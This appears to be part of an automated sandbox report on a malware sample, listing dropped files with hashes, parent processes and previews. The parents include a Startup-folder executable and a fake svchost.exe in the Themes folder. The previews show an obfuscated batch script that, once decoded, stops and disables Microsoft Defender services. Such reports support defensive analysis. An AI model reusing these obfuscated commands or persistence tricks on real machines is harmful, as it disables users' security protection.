                                                                                                                  Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):21612
                                                                                                                  Entropy (8bit):5.600891430343444
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:ctL6Rq0vKcoo0ClK7i3n3IS0nEjultICspE93Uu16zC5maxHVs3QSKj6I8I++jd:CoLYTEClt4wuCUCaQPmlQ
                                                                                                                  MD5:09C404B27F5292390D39AF53E7C6A6E4
                                                                                                                  SHA1:B4218A4F9A11BE3E29B053656B8FE1FB6CE54574
                                                                                                                  SHA-256:4A7D019EAB126BF9971DD10C6E47658407A986EF25294A87BA2C3BB4104F7706
                                                                                                                  SHA-512:4A85E798C11A0C4595CF3B42EA064F6F25E916877C39729E9FC6B518FDF4CF2AA843EBE6B9A3A79A30AE1561ED29DB6B2DA212C61AC01E8E08BA517015977511
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @...e...................h.?.(.".x.....c...I..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)P.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                                                                  C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dzsxkm1.gmw.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0k00wotq.d3h.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0uko0qtt.v1f.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54v3gsur.dvq.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5z51jnmi.3bc.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afkkkgq1.y0i.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duwzq4u5.ro3.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_grxndcbs.jvz.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5nm0hzg.gxy.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0bhscjr.xhy.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mo22qrr4.kn0.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nein1cmy.5m1.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojwwilnd.ypi.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q2gw4bjc.itm.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqnhaj14.abr.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5xybjsm.dfn.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):0
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):0
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
